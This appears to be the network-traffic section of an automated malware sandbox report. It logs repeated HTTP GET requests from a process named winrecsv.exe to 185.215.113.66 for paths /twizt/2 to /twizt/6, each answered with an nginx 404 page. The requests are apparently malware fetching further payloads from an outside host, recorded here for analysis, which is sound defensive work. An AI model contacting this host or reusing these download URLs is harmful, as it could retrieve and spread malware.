                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:59.134948015 CEST8080OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:59.191648960 CEST8081INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:59 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                13192.168.2.749852185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:33:03.461499929 CEST8171OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:03.518565893 CEST8172INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:03 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:33:04.547296047 CEST8214OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:04.604392052 CEST8215INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:04 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:33:05.621536016 CEST8337OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:05.686567068 CEST8339INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:05 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:33:06.697235107 CEST8381OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:06.754378080 CEST8382INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:06 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:33:07.794137955 CEST8462OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:07.851281881 CEST8463INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:07 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                14192.168.2.749859185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:33:11.077593088 CEST8463OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:11.134056091 CEST8464INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:11 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:33:12.150340080 CEST8471OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:12.211927891 CEST8472INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:12 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
